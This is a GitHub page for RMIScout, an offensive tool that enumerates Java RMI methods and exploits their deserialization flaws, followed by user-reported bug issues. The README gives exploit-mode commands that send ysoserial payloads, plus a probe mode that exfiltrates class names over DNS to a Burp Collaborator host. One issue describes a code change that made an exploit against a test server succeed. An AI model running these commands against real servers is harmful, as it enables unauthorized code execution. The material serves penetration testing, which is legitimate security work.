bishopfox / rmiscout Goto Github PK

RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities

Home Page: https://labs.bishopfox.com/tech-blog/rmiscout

License: MIT License

Java 99.64% Shell 0.21% Dockerfile 0.15%

java java-rmi java-deserialization security-tools offensive-security javassist scanner

rmiscout's Introduction

Description

RMIScout enables wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation. It supports multiple Java RMI protocols, method invocation, and exploitation.

Feature overview

Supports multiple types of Java RMI servers:
- RMI-JRMP (AKA plain RMI; usually port 1099): Remote object registry service (rmiregistry)
- RMI Activation Stubs via rmid
- RMI-IIOP: Java CORBA programming model (orbd; usually port 1050)
  - IIOP requires JRE 1.8 to use. Due to deprecation in later runtimes.
- RMI-SSL
Multiple modes of operation
- wordlist mode: Test for remote methods using a wordlist of signatures (see included lists/prototypes.txt)
- bruteforce mode: Given a wordlist of method names generate signatures with various parameter types, # of params, and return types.
- exploit mode: Use ysoserial to exploit remote methods with non-primitive parameters.
  - Requires rmiscout to be run with JRE 1.8 for ysoserial to work properly.
- probe mode: Use GadgetProbe to identify classes in the remote classpath
- invoke mode: Directly invoke remote methods by specifying a method signature and parameter values from the command line (primitives, arrays, and Strings only).
- list mode: List available registries on remote server.
Automatically switches between RMI, RMI-SSL, Activation stubs.
Automatically performs localhost bypass techniques (e.g., registries bound to @127.0.0.1:XXXX, but still externally exposed via XXXX)

How it works

To identify but not execute RMI functions, RMIScout uses low-level RMI network functions and dynamic class generation to send RMI invocations with deliberately mismatched types to trigger remote exceptions. All parameters are substituted for a dynamically generated serializable class with a 255-character name assumed to not exist in the remote class path. For example:

Remote Interface:

void login(String user, String password)

RMIScout will invoke:

login((String) new QQkzkn3..255 chars..(), (String) new QQkzkn3..255 chars..())

If the class is present this will result in a remote java.rmi.UnmarshalException cased by the ClassNotFoundException or argument unmarshalling error without invoking the underlying method.

For more detailed technical writeups:

Modes of operation

Wordlist mode

./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

Supply a wordlist of method prototypes to check for on the remote server. RMIScout will output all identified matches.

For RMI-IIOP/CORBA: Unless methods are overloaded, brute forcing and invocation only require names to match (all other information is ignored).

Bruteforce mode

./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

Supply a wordlist of candidate method names, then provide a comma-delimited list of candidate return types, number range of parameters, and candidate parameter types. Bruteforce mode will generate the permutations and look for matching signatures.

Exploit mode

./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

On misconfigured servers, any known RMI signature using non-primitive types (e.g., java.util.List), can be exploited by replacing the object with a serialized payload. This is a fairly common misconfiguration (e.g., VMWare vSphere Data Protection + vRealize Operations Manager, Pivotal tc Server and Gemfire, Apache Karaf + Cassandra) as highlighted in An Trinh's 2019 Blackhat EU talk.

RMIScout integrates with ysoserial to perform deserialization attacks against services incorrectly configuring process-wide serialization filters (JEP 290).

Examples of exploitable signatures:

void exampleMethod(java.util.Map a) // Any non-primitive types
void exampleMethod(float[] a) // Any type of array, even primitives
void exampleMethod(String a) // Works on older JDKs, see below...

Note: Signatures containing java.lang.String types are only exploitable in JRE 8/11/13/14 releases prior to early 2020 in RMI-JRMP, but are still currently exploitable in RMI-IIOP.

Invoke mode

./rmiscout.sh invoke -p 1 -p 4 -s 'int add(int a, int b)' <host> <port>
./rmiscout.sh invoke -p 1,2,3,4 -s 'int addList(int[] a)' <host> <port>

RMIScout let's you invoke any signatures with primitives, primitive arrays, or Strings. More advanced types will require writing a custom client.

Probe mode

./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

RMIScout integrates with GadgetProbe to identify classes in the remote classpath. Class names are exfiltrated via DNS.

Building and Running

Use the included rmiscout.sh script to automatically build the project and as a convenient wrapper around java -jar syntax:

./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

Alternatively, build the project manually and use traditional java -jar syntax:

# Manually build JAR
./gradlew shadowJar

java -jar build/libs/rmiscout-1.4-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt <host> <port>

Note: RMI-IIOP (compile/runtime) and ysoserial (runtime) depend on JDK8.

Try It out

Run the dockerized demo RMI server. Try out the included demo/wordlist.txt.

cd demo
./start_demo.sh

Troubleshooting

Q: How can I tell if <host>:<port> an RMI Registry?

Use ./rmiscout list <host> <port> to get information about registries on a remote server.

[INFO] Registries available on 127.0.0.1:1099 = [ActivationServer:com.bishopfox.example.ActivationImpl_Stub, plaintest:com.bishopfox.example.HelloInterface]

Or, use nmap's rmi-dumpregistry script:

nmap --script rmi-dumpregistry 172.17.0.1 -p 1099 -Pn

PORT     STATE SERVICE
1099/tcp open  rmiregistry
| rmi-dumpregistry:
|   ActivationServer
|     com.bishopfox.example.ActivationImpl_Stub
|     \x00\x0EActivatableRef
|     extends
|       java.rmi.server.RemoteStub
|       extends
|         java.rmi.server.RemoteObject
|   plaintest
|      implements com.bishopfox.example.HelloInterface,
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @127.0.0.1:1111
|             extends
|_              java.rmi.server.RemoteObject

Q: I found a registry on port 1098 with the name java.rmi.activation.ActivationSystem. What can I do with it?

This is an rmid Activation System Daemon. All of its methods are restricted by the SecurityManager. More recent JREs check if the remote peer originates from localhost before deserializing any remote data. Older (pre 2011) versions did not have this check and may be vulnerable. See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb

Q: Can I run RMIScout with a newer runtime than JRE 8?

A: Technically yes, but a variety of features will stop working. CORBA support, probe support, and ysoserial (exploit mode) mandate a JRE 8 dependency.

Q: Why am I getting a CannotCompileException?

A: A CannotCompileException occurs when an invalid method name or prototype is supplied directly or via a wordlist. RMIScout generates bytecode for user-supplied candidate signatures at runtime. Although RMIScout has basic rules for correcting common syntax errors in user-supplied prototypes, it will sometimes fail.

Author

Twitter: @BumbleSec

GitHub: the-bumble

rmiscout's People

Contributors

Stargazers

Watchers

Forkers

asdyxcyxc rvrsh3ll latkes gdraperi timb-machine-mirrors ethancck fzxcp3 askyeye securityanalysts smitnald c002 shimizukawasaki sec99 laowang1026 doanhnhq bbhunter mmg1 test123test111 jermainlaforce rajivraj monopole-zh ingramali harry1080 arryboom rassec f-alpha5 polling-repo-continua h1d3r nickstadb pentest-toolz antichown wdahlenburg wadewfsssss hamid-k freefv masterscott an0nym0u5101 milam hatchetxuexi minkione nosorry 0x5a65726f4b65776c khyveasna11111908 segxi wilsonleeee 3453-315h scopion atlassion sanchahua attacker-codeninja secjia earthenvessel 0xsojalsec spy0x7 prahs werwolfz babywyrm fulanah-binti-fulanah fckoo

rmiscout's Issues

javax.net.ssl.SSLException: Unsupported or unrecognized SSL message

Hello,

I've identified a running RMI instance on a host, however when I try to run rmiscout against the host I recieve the following message:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
        at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
        at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
        at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
        at java.base/java.lang.Class.forName0(Native Method)
        at java.base/java.lang.Class.forName(Class.java:315)
        at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
        at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
[INFO] No registry specified. Attempting operation on all available registries...
[ERROR] error during JRMP connection establishment; nested exception is: 
        javax.net.ssl.SSLException: Unsupported or unrecognized SSL message                                       
Might be RMI-IIOP (--iiop) or server might use non-standard protocol.

Is there a way to bypass or ignore SSL errors when connecting? I tried re-running with --activation server which provided the same message.

The command I'm running is:

java -jar rmiscout-1.4-SNAPSHOT-all.jar wordlist -i prototypes.txt x.x.x.x rmi_port#

Dockerfile does not work

Description of Bug

The Docker build operation does not work as expected.

What should the expected behavior be

Docker build successful.

Platform Affected

N/A

Steps to Reproduce

docker build . -t rmiscout
Sending build context to Docker daemon  13.04MB
Step 1/6 : FROM openjdk:8
8: Pulling from library/openjdk
df5590a8898b: Pull complete 
705bb4cb554e: Pull complete 
519df5fceacd: Pull complete 
ccc287cbeddc: Pull complete 
39a2961e8351: Pull complete 
a12df774715e: Pull complete 
08f28107b8b3: Pull complete 
Digest: sha256:29790ba47d15339629a8e6c2ae971b5ec417e2b99b24a4f2506d29439bd5bcb4
Status: Downloaded newer image for openjdk:8
 ---> c6a23ae24020
Step 2/6 : COPY . /rmiscout
 ---> 5713a7b8f3d9
Step 3/6 : WORKDIR /rmiscout
 ---> Running in ee04b6a6efa3
Removing intermediate container ee04b6a6efa3
 ---> 6c98d19414ac
Step 4/6 : RUN ./gradlew shadowJar
 ---> Running in 6d720f86e604
Downloading https://services.gradle.org/distributions/gradle-4.10.3-bin.zip
..........................................................................

Welcome to Gradle 4.10.3!

Here are the highlights of this release:
 - Incremental Java compilation by default
 - Periodic Gradle caches cleanup
 - Gradle Kotlin DSL 1.0-RC6
 - Nested included builds
 - SNAPSHOT plugin versions in the `plugins {}` block

For more details see https://docs.gradle.org/4.10.3/release-notes.html

Starting a Gradle Daemon (subsequent builds will be faster)
> Task :compileJava FAILED

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':compileJava'.
> A problem occurred starting process 'command '/usr/lib/jvm/jdk1.8.0_301/bin/javac''

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at https://help.gradle.org

Deprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.
Use '--warning-mode all' to show the individual deprecation warnings.
See https://docs.gradle.org/4.10.3/userguide/command_line_interface.html#sec:command_line_warnings

BUILD FAILED in 34s
1 actionable task: 1 executed
The command '/bin/sh -c ./gradlew shadowJar' returned a non-zero code: 1

javassist.CannotCompileException

I'm getting the following error when trying to run the wordlist against a remote host.

# ./rmiscout.sh wordlist -i lists/prototypes.txt x.x.x.x xxxxx
javassist.CannotCompileException: by java.lang.SecurityException: Prohibited package name: java.rmi.activation
        at javassist.ClassPool.toClass(ClassPool.java:1120)
        at javassist.ClassPool.toClass(ClassPool.java:1063)
        at javassist.CtClass.toClass(CtClass.java:1315)
        at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:120)
        at com.bishopfox.rmiscout.RMIConnector.<init>(RMIConnector.java:80)
        at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:193)
        at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:131)
Caused by: java.lang.SecurityException: Prohibited package name: java.rmi.activation
        at java.lang.ClassLoader.preDefineClass(ClassLoader.java:655)
        at java.lang.ClassLoader.defineClass(ClassLoader.java:754)
        at java.lang.ClassLoader.defineClass(ClassLoader.java:635)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at javassist.ClassPool.toClass2(ClassPool.java:1133)
        at javassist.ClassPool.toClass(ClassPool.java:1114)
        ... 6 more

I'm running the following Java version:

# java -version
openjdk version "1.8.0_252"
OpenJDK Runtime Environment (build 1.8.0_252-8u252-b09-1~deb9u1-b09)
OpenJDK 64-Bit Server VM (build 25.252-b09, mixed mode)

Error in openjdk version "11.0.7-ea" 2020-04-14

kali@kali:/opt/rmiscout$ ./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 [ip] [port
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Generating Permutations for [void] type...
Finished generating and querying 1110 Permutations

[ERROR] Did you forget to remove the interface name from the method name?

Full Stacktrace:

javassist.CannotCompileException: by java.lang.ClassFormatError: Illegal class name "" in class file
at javassist.ClassPool.toClass(ClassPool.java:1120)
at javassist.ClassPool.toClass(ClassPool.java:1063)
at javassist.CtClass.toClass(CtClass.java:1315)
at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:213)
at com.bishopfox.rmiscout.RMIConnector.(RMIConnector.java:124)
at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:198)
at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:158)
Caused by: java.lang.ClassFormatError: Illegal class name "" in class file
at java.base/java.lang.ClassLoader.defineClass1(Native Method)
at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1017)
at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:878)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:566)
at javassist.ClassPool.toClass2(ClassPool.java:1133)
at javassist.ClassPool.toClass(ClassPool.java:1114)
... 6 more

kali@kali:/opt/rmiscout$ java -version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk version "11.0.7-ea" 2020-04-14
OpenJDK Runtime Environment (build 11.0.7-ea+9-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.7-ea+9-post-Debian-1, mixed mode, sharing)

[ERROR] Dummy parameter names are required for method signature (e.g., -s 'boolean login(java.lang.String a, java.lang.String b)')

New version throw an Exception:

kali@kali:~/tools/rmiscout$ ./rmiscout.sh wordlist -i lists/prototypes.txt 127.0.0.1 1099
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[INFO] Adding missing dummy parameter names to signature
[INFO] Auto-corrected signature: java.lang.Boolean[] wrapperBooleanArrayTest(java.lang.Boolean[] v a)

[ERROR] Dummy parameter names are required for method signature (e.g., -s 'boolean login(java.lang.String a, java.lang.String b)')

Full Stacktrace:

javassist.CannotCompileException: [source error] syntax error near "ean[] v a) throws ja"
at javassist.CtNewMethod.make(CtNewMethod.java:79)
at javassist.CtNewMethod.make(CtNewMethod.java:45)
at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:197)
at com.bishopfox.rmiscout.RMIConnector.(RMIConnector.java:124)
at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:198)
at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:136)
Caused by: compile error: syntax error near "ean[] v a) throws ja"
at javassist.compiler.Parser.parseFormalParam(Parser.java:210)
at javassist.compiler.Parser.parseMethod1(Parser.java:114)
at javassist.compiler.Parser.parseMember1(Parser.java:65)
at javassist.compiler.Javac.compile(Javac.java:90)
at javassist.CtNewMethod.make(CtNewMethod.java:74)
... 5 more

RMI services generated by Spring Framework's RmiInvocationHandler?

While testing RMI services generated by Spring Framework's RmiInvocationHandler, rmiscout complains about signatures not matching even when using signatures copied straight from the Interface definition in the decompiled server component jar.

It appears like Spring wraps the service methods and therefore change the signature, but I don't know in what way yet. Have you had any experience with any such services?

Detect Objects Exposed via javax.rmi.ssl.SslRMIClientSocketFactory

Eh up! Nice work, love a bit of RMI hackery! I had a chance to test this out on a client engagement recently and hit a gotcha that might be worth handling and documenting.

Essentially an RMI service can associate a socket factory with a bound object reference. Method invocations against the returned object reference will use the socket factory class requested by the server (see https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/socketfactory/index.html#usingCustomSocketFactory) to create a socket for the connection and method invocation. In this case javax.rmi.ssl.SslRMIClientSocketFactory was used along with a self-signed certificate. This resulted in a java.rmi.ConnectIOException being thrown here https://github.com/BishopFox/rmiscout/blob/master/src/main/java/com/bishopfox/rmiscout/RMIConnector.java#L313. The full stack trace is included below for reference.

It seems to be a PitA to get Java to accept self-signed certs but the solution I came up with was:

Capture the network traffic from rmiscout to identify the message from the server containing the TLS certificate
Save the certificate to a file (in my case with Wireshark, select the Certificate: xxxx row in the packet details pane, right-click and select Export Packet Bytes)
Import the certificate into the Java keystore (on Ubuntu 18 I did this with keytool -import -keystore /etc/ssl/certs/java/cacerts -storepass changeit -file cert.crt)

After importing the certificate, rmiscout was able to attempt method invocations on the object. Sadly no luck this time :(

You can probably hack something together to handle this cleanly (i.e. possibly altering the socket factory, not sure if proxying, similar to what I do with BaRMIe, would be required), but it's probably worth at least catching the exception and bailing out so rmiscout doesn't attempt 100s or 1000s of connections to a service it can't speak to.

java.rmi.ConnectIOException: error during JRMP connection establishment; nested exception is: 
	javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.rmi.transport.tcp.TCPChannel.createConnection(TCPChannel.java:307)
	at sun.rmi.transport.tcp.TCPChannel.newConnection(TCPChannel.java:202)
	at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:132)
	at com.bishopfox.rmiscout.RMIConnector.execute(RMIConnector.java:313)
	at com.bishopfox.rmiscout.RMIConnector.checkIfPresent(RMIConnector.java:241)
	at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:197)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:134)
Caused by: javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.security.ssl.Alerts.getSSLException(Alerts.java:198)
	at sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1967)
	at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:331)
	at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:325)
	at sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:1688)
	at sun.security.ssl.ClientHandshaker.processMessage(ClientHandshaker.java:226)
	at sun.security.ssl.Handshaker.processLoop(Handshaker.java:1082)
	at sun.security.ssl.Handshaker.process_record(Handshaker.java:1010)
	at sun.security.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:1079)
	at sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1388)
	at sun.security.ssl.SSLSocketImpl.writeRecord(SSLSocketImpl.java:765)
	at sun.security.ssl.AppOutputStream.write(AppOutputStream.java:123)
	at java.io.BufferedOutputStream.flushBuffer(BufferedOutputStream.java:82)
	at java.io.BufferedOutputStream.flush(BufferedOutputStream.java:140)
	at java.io.DataOutputStream.flush(DataOutputStream.java:123)
	at sun.rmi.transport.tcp.TCPChannel.createConnection(TCPChannel.java:229)
	... 6 more
Caused by: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:450)
	at sun.security.validator.PKIXValidator.engineValidate(PKIXValidator.java:317)
	at sun.security.validator.Validator.validate(Validator.java:262)
	at sun.security.ssl.X509TrustManagerImpl.validate(X509TrustManagerImpl.java:330)
	at sun.security.ssl.X509TrustManagerImpl.checkTrusted(X509TrustManagerImpl.java:237)
	at sun.security.ssl.X509TrustManagerImpl.checkServerTrusted(X509TrustManagerImpl.java:132)
	at sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:1670)
	... 17 more
Caused by: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.security.provider.certpath.SunCertPathBuilder.build(SunCertPathBuilder.java:141)
	at sun.security.provider.certpath.SunCertPathBuilder.engineBuild(SunCertPathBuilder.java:126)
	at java.security.cert.CertPathBuilder.build(CertPathBuilder.java:280)
	at sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:445)
	... 23 more

Build the project manually

1. # export JAVA_TOOL_OPTIONS="-Dhttps.protocols=TLSv1.2" <-- to fix the HTTPS issues
2. rmiscout# ./gradlew shadowJar <-- to be checked the following errors
Picked up JAVA_TOOL_OPTIONS: -Dhttps.protocols=TLSv1.2

FAILURE: Build failed with an exception.

Where:
Build file '/root/rmiscout/build.gradle' line: 4
What went wrong:
Plugin [id: 'com.github.johnrengelman.shadow', version: '2.0.4'] was not found in any of the following sources:

Gradle Core Plugins (plugin is not in 'org.gradle' namespace)
Plugin Repositories (could not resolve plugin artifact 'com.github.johnrengelman.shadow:com.github.johnrengelman.shadow.gradle.plugin:2.0.4')
Searched in the following repositories:
Gradle Central Plugin Repository

Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.
Get more help at https://help.gradle.org

Deprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.
Use '--warning-mode all' to show the individual deprecation warnings.
See https://docs.gradle.org/4.10.3/userguide/command_line_interface.html#sec:command_line_warnings

BUILD FAILED in 0s

demo does not work

None

No workey

It not working. Need some updating DDDAAAANNNNNNN

Errors when trying out the demo

Hi, I've just downloaded your project and get errors when trying out the demo. When launching the docker image, I get the following output:

$ sudo ./start_demo.sh 
Sending build context to Docker daemon  39.42kB
Step 1/7 : FROM openjdk:8
 ---> 08121337b7a4
Step 2/7 : COPY . /demo/
 ---> Using cache
 ---> cf5a149f4afa
Step 3/7 : WORKDIR /demo/
 ---> Using cache
 ---> 32a252e1431d
Step 4/7 : RUN chmod +x run.sh
 ---> Using cache
 ---> 4726b9e20b05
Step 5/7 : RUN javac com/bishopfox/example/*.java
 ---> Using cache
 ---> 7a9380ddf249
Step 6/7 : RUN rmic -d . com.bishopfox.example.ActivationImpl &&     rmic -d . -iiop com.bishopfox.example.CorbaImpl &&     rmic -d . com.bishopfox.example.SSLServer
 ---> Using cache
 ---> 11b2c341ba51
Step 7/7 : ENTRYPOINT ["./run.sh"]
 ---> Using cache
 ---> c786833d4889
Successfully built c786833d4889
Successfully tagged rmiscout-demo:latest
java.lang.Exception: Stack trace
	at java.lang.Thread.dumpStack(Thread.java:1336)
	at sun.rmi.server.Activation$ActivationSystemImpl.registerGroup(Activation.java:538)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:357)
	at sun.rmi.transport.Transport$1.run(Transport.java:200)
	at sun.rmi.transport.Transport$1.run(Transport.java:197)
	at java.security.AccessController.doPrivileged(Native Method)
	at sun.rmi.transport.Transport.serviceCall(Transport.java:196)
	at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:573)
	at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:834)
	at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.lambda$run$0(TCPTransport.java:688)
	at java.security.AccessController.doPrivileged(Native Method)
	at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:687)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
Got the stub for HelloInterface
ActivationServer ready on port 1099...
Plain Server ready on port 1099...
RMI-IIOP Server ready on port 1050...
SSL Server ready on port 1100...

The stack trace looks scary but the servers are up and I can scan them with nmap.

When I then try to use rmiscout to connect to port 1099, I get this:

$ ./rmiscout.sh wordlist -i demo/wordlist.txt -n ActivationServer 127.0.0.1 1099
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
	at java.base/java.lang.Class.forName0(Native Method)
	at java.base/java.lang.Class.forName(Class.java:315)
	at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
[INFO] Attempting operation on the "ActivationServer" registry.
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by javassist.ClassPool (file:/home/rmiscout/build/libs/rmiscout-1.4-SNAPSHOT-all.jar) to method java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int)
WARNING: Please consider reporting this to the maintainers of javassist.ClassPool
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
[INFO] Skipping, void args: String restart()

A similar thing happens with the registry 'plaintest'. Listing of the regirstier works even tough the same error gets shown:

$ ./rmiscout.sh list 127.0.0.1 1099
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
	at java.base/java.lang.Class.forName0(Native Method)
	at java.base/java.lang.Class.forName(Class.java:315)
	at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
[INFO] Registries available on 127.0.0.1:1099 = [
	name[0] = ActivationServer
		class = com.bishopfox.example.ActivationImpl_Stub
	name[1] = plaintest
		class = com.bishopfox.example.HelloInterface

My JAVA_HOME is /opt/jdk1.8.0_301 and the build of rmiscout was successful. What could be the issue?

Loads of thanks for your help!

javassist.CannotCompileException: [source error] syntax error near " android.os.IBinder "

Hi,
I'm having the following error reported regardless the option that is selected.

The command that created the error on this case was

rmiscout bruteforce -i lists/prototypes.txt -r void,boolean,long -p String,int -l 1,4 host 1099

Generating Permutations for [void] type...
Finished generating and querying 76500 Permutations

[ERROR] Did you forget to remove the interface name from the method name?

Full Stacktrace:

javassist.CannotCompileException: [source error] syntax error near " android.os.IBinder "
at javassist.CtNewMethod.make(CtNewMethod.java:79)
at javassist.CtNewMethod.make(CtNewMethod.java:45)
at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:197)
at com.bishopfox.rmiscout.RMIConnector.(RMIConnector.java:124)
at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:198)
at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:158)
Caused by: compile error: syntax error near " android.os.IBinder "
at javassist.compiler.Parser.parseField(Parser.java:91)
at javassist.compiler.Parser.parseMember1(Parser.java:67)
at javassist.compiler.Javac.compile(Javac.java:90)
at javassist.CtNewMethod.make(CtNewMethod.java:74)
... 5 more

Is RMIConnector process logic get mistake?

enviroment: jdk8u202
running command: exploit -s "void hello(com.PersonDTO personDTO)" -p ysoserial.payloads.URLDNS -c "http://xxx.xxx.xxx" -n myRmiService 127.0.0.1 1099

And I get a error:

java.lang.IllegalArgumentException: Can not set java.rmi.server.RemoteRef field java.rmi.server.RemoteObject.ref to com.sun.proxy.$Proxy0
	at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
	at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
	at sun.reflect.UnsafeFieldAccessorImpl.ensureObj(UnsafeFieldAccessorImpl.java:58)
	at sun.reflect.UnsafeObjectFieldAccessorImpl.get(UnsafeObjectFieldAccessorImpl.java:36)
	at java.lang.reflect.Field.get(Field.java:393)
	at com.bishopfox.rmiscout.RMIConnector.execute(RMIConnector.java:363)
	at com.bishopfox.rmiscout.RMIConnector.exploit(RMIConnector.java:270)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:325)

My RMI Server code is the following, very simple

public class Main {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(1099);
        MyRmiService myRmiService = new MyRmiServiceImpl();
        registry.bind("myRmiService", myRmiService);
   }
}

I find out the following code when I debug the error:
RMIConnector.java

Remote stub = pair.getValue();
......
// Bypass internal call flow for custom params
RemoteRef ref = null;
if (interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}

rmiscout always get into the true block. But stub is Proxy with implement Remote type, It CAN NOT get a ref Field.That cause the error.

I think the false block is the better to handle stub.So I change the code in RMIConnector.java

//add a !
if (!interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}

Rerun rmiscout, It works! The RMI Server is attacked successful.

[ERROR] RMI Activation Server detected. Re-run with --activation-server

Hi, whilst trying to run the latest release I'm constantly receiving the following error

[ERROR] RMI Activation Server detected. Re-run with --activation-server

